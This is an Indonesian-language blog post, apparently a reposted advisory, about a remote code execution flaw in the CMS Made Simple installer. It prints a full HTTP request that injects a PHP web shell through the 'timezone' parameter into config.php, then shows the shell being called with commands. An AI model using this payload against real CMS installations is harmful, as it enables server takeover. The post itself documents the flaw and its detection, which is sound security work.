# BERBAGI SEPUTAR INFORMASI DUNIA INTERNET ! Kerentanan Remote Code Execution Di CMS Made Simple (CMSMS) - BERBAGI SEPUTAR INFORMASI DUNIA INTERNET

Hotnews>


INFORMASI SEPUTAR DUNIA INTERNET
INFORMASI DAN TUTORIAL !
TOOLS,SOFTWARE AND OTHER.
HOPE YOU ENJOY IT ;)

Saturday, February 23, 2019

Kerentanan Remote Code Execution Di CMS Made Simple (CMSMS)

Kerentanan dalam eksekusi jarak jauh dari kode arbitary telah ditemukan dalam sistem manajemen situs CMS Made Simple.

CMS Made Simple (disingkat CMSMS) adalah sistem manajemen situs yang dengannya Anda dapat membuat situs web,mendesain desainnya, dan memperluas fungsionalitas. Sistem ini dapat diperluas dengan bantuan modul dan tag dan cocok untuk mengelola situs kecil dan untuk mengatur seluruh portal.

Kerentanan terkandung dalam script instalasi dan memungkinkan penyerang untuk menyuntikkan kode arbitary ke script config.php yang dihasilkan selama instalasi aplikasi web. Parameter yang rentan adalah "zona waktu".

Contoh permintaan yang mengarah ke rekaman fungsionalitas web shell di file config.php :

" POST /cms/cms-2.1.6-install.php/index.php?mdf68c24c=4 HTTP / 1.1
Host: 192.168.5.196
User-Agent: Mozilla / 5.0 (X11; Linux x86_64; rv: 52.0) Gecko / 20100101
Firefox / 52.0
Accept: text / html, application / xhtml + xml, application / xml; q = 0.9, * / *; q = 0.8
Accept-Language: en-US, en; q = 0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.5.196/cms/cmsms-2.1.6-install.php/index.
php? mdf68c24c = 4
Cookie: CMSICc861538bbb = i549m59qpme0u9klupbkb68me4
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application / x-www-form-urlencoded
Content-Length: 126

dbhost = localhost & dbname = cms & dbuser = xvwa & dbpass = xvwa &
timezone = junk ' ; echo% 20system ($ _ GET [' cmd ']); $ junk = 'junk & next = Next +% E2% 86% 92 "

Setelah implementasi payload, penyerang akan menerima web shell pada sistem yang diserang :

" http: //target/path/config.php? cmd = id; uname "

Serangan seperti itu diblokir oleh analisis tanda tangan. Dalam kasus obfuscation payload,
permintaan diproses oleh modul kecerdasan buatan Nemesida WAF,
yang mengenali anomali dalam parameter permintaan dan memungkinkan mendeteksi eksploitasi kerentanan

No comments:

Post a Comment